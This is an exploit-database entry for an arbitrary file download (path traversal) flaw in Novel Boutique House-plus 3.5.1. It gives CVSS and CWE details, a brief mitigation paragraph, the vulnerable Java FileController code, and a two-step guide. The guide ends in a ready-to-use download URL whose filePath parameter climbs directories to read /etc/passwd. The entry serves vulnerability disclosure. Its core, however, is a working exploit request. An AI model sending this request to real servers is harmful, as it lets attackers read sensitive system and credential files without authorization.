header-logo
Suggest Exploit
vendor:
Boutique House-plus
by:
tuyiqiang
7.5
CVSS
HIGH
Arbitrary File Download
22
CWE
Product Name: Boutique House-plus
Affected Version From: all
Affected Version To: all
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Linux
2021

Novel Boutique House-plus 3.5.1 – Arbitrary File Download

The Novel Boutique House-plus version 3.5.1 is vulnerable to an arbitrary file download attack. The 'fileDownload' function in the 'FileController.java' file allows an attacker to specify a file path and download arbitrary files from the server. By providing a crafted 'filePath' parameter with directory traversal sequences, an attacker can bypass the file path validation and download sensitive files from the server, such as the '/etc/passwd' file.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent directory traversal attacks. Additionally, access controls should be implemented to restrict unauthorized access to sensitive files.
Source

Exploit-DB raw data:

# Exploit Title: Novel Boutique House-plus 3.5.1 - Arbitrary File Download
# Date: 27/03/2021
# Exploit Author: tuyiqiang
# Vendor Homepage: https://xiongxyang.gitee.io/
# Software Link: https://gitee.com/novel_dev_team/novel-plus,https://github.com/201206030/novel-plus
# Version: all
# Tested on: linux

Vulnerable code:

com/java2nb/common/controller/FileController.java

@RequestMapping(value = "/download")
public void fileDownload(String filePath,String fileName, HttpServletResponse resp) throws Exception {
      String realFilePath = jnConfig.getUploadPath() + filePath;
      InputStream in = new FileInputStream(realFilePath);
            fileName = URLEncoder.encode(fileName, "UTF-8");
      resp.setHeader("Content-Disposition", "attachment;filename=" + fileName);

      resp.setContentLength(in.available());

      OutputStream out = resp.getOutputStream();
      byte[] b = new byte[1024];
      int len = 0;
      while ((len = in.read(b)) != -1) {
         out.write(b, 0, len);
      }
      out.flush();
      out.close();
      in.close();
}


Guide:

1. Log in to background management
2. http://xxxx/common/sysFile/download?filePath=../../../../../../../../../../../../../../../../../etc/passwd&fileName=passwd

Navigation

Suggest Exploit

Services By CQR